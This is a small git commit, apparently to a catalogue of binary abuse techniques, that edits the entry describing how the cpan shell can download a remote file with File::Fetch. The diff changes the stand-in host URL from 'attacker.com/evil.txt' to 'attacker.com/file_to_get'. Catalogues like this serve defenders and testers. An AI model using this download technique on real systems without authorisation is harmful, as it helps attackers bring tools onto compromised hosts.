Polish cpan

This commit is contained in:
Emilio Pinna 2018-11-08 20:01:40 +00:00
parent 754e5e0f95
commit 27c1c56577

View File

@ -23,7 +23,7 @@ functions:
file-download: file-download:
- description: Fetch a remote file via HTTP GET request and store it in PWD. - description: Fetch a remote file via HTTP GET request and store it in PWD.
code: | code: |
export URL=http://attacker.com/evil.txt export URL=http://attacker.com/file_to_get
cpan cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch(); ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();